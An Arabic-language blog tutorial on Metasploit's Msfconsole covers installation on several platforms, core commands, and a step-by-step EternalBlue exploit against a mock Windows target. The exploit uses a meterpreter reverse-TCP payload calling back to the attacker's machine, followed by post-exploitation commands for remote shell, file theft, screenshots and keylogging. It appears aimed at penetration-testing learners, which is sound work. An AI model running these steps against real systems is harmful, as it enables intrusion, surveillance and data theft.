Blog Wallpaper
A
ALI ALAKABRالسبت، 28 يونيو 2025

Msfconsole

أداة Msfconsole هي الواجهة الأساسية لإطار Metasploit، وتُستخدم لتنفيذ واستغلال الثغرات الأمنية بطريقة احترافية ومنظمة.

منذ شهرين تقريبا

Area Iconالأمن السيبراني - إختبار الإختراق6.4.69 النسخة

شنو هي Msfconsole؟

هي الواجهة التفاعلية الرئيسية لـ Metasploit Framework. تخليك تتحكم بكل إمكانيات ميتاسبلويت من مكان واحد، تكدر تبحث عن ثغرات، تسوي Exploit، ترفع Payload، تنشئ Session تحكم بالهدف، وتحلّل النتائج.


شنو الفائدة منها؟

  • إذا انت باحث أمني: تكتشف الثغرات وتبلّغ عنها.
  • إذا انت طالب أو مبتدئ: تتعلم شلون تشتغل الهجمات وتفهم شلون يصير الاختراق.

شلون نثبّت Msfconsole؟ 🔧

1. باستخدام Kali Linux :

إذا عندك Kali، فـ Metasploit موجود أصلًا، بس لازم تتأكد أنه محدث:

sudo apt update
sudo apt install metasploit-framework

2. على نظام Ubuntu أو Debian :

sudo apt update
sudo apt install curl gnupg2
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
chmod +x msfinstall
./msfinstall

3. على Windows :

  • تنزل مثبت Metasploit من موقع Rapid7 الرسمي.
  • تنصّبه مثل أي برنامج عادي.
  • تفتح msfconsole من CMD.

4. على Termux (إذا عندك أندرويد)

pkg update && pkg upgrade
pkg install unstable-repo
pkg install metasploit
msfconsole

أول ما تفتح Msfconsole – شنو راح تشوف؟

تكتب بالأمر:

msfconsole

تكتب help أو ? يطلعلك كل الأوامر المتوفرة.

الأوامر
الأوامر

أوامر مهمة داخل Msfconsole :

الأمرالوظيفة
searchتبحث عن ثغرات أو مودل
useتستخدم مودل معين (exploit أو auxiliary)
infoتعرض معلومات مفصلة عن المودل
setتحدد قيم المتغيرات (مثل RHOST, RPORT, PAYLOAD)
show payloadsتعرض أنواع البايلودات المتاحة
exploit أو runتشغل الهجوم

مثال عملي: اختراق جهاز ويندوز وهمي بثغرة EternalBlue

1. شغل Msfconsole:

msfconsole

2. ابحث عن الثغرة:

search eternalblue

راح يطلعلك شي مثل:

exploit/windows/smb/ms17_010_eternalblue
اختيار استغلال
اختيار استغلال

3. استخدم المودل:

use exploit/windows/smb/ms17_010_eternalblue

4. اظهر البايلودات:

show payloads

نختار مثلاً:

windows/x64/meterpreter/reverse_tcp

5. نحدد الإعدادات:

بالبدية تشوف المطلوب منك:

show options

بعدها تحدد مثلاً :

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.1.10   # عنوان الضحية
set LHOST 192.168.1.5     # جهازك
set LPORT 4444
التنفيذ
التنفيذ

6. شغّل الهجوم:

exploit

إذا الثغرة اشتغلت، راح تطلعلك جلسة meterpreter، تكدر تدخل على النظام الهدف وتتحكم بيه.


أوامر Meterpreter ( بعد ما تدخل للـSession للضحية ):

الأمرالوظيفة
sysinfoمعلومات عن النظام
getuidيظهر المستخدم الحالي
shellتفتح تيرمنال على جهاز الضحية
downloadتحميل ملفات من الجهاز الهدف
uploadرفع ملفات إلى الجهاز الهدف
screenshotتاخذ لقطة شاشة
keyscan_start / keyscan_dumpتسجل ضغطات لوحة المفاتيح

أشياء روتينية تكدر تستعملها:

  • دائمًا حدث الـ Metasploit حتى تحصل أحدث الثغرات:
msfupdate
  • تكدر تكتب سكربتات automate للثغرات باستخدام resource scripts.
  • تكدر تستخدم db_nmap بدل nmap العادي حتى تخزن النتائج داخل قاعدة بيانات Metasploit.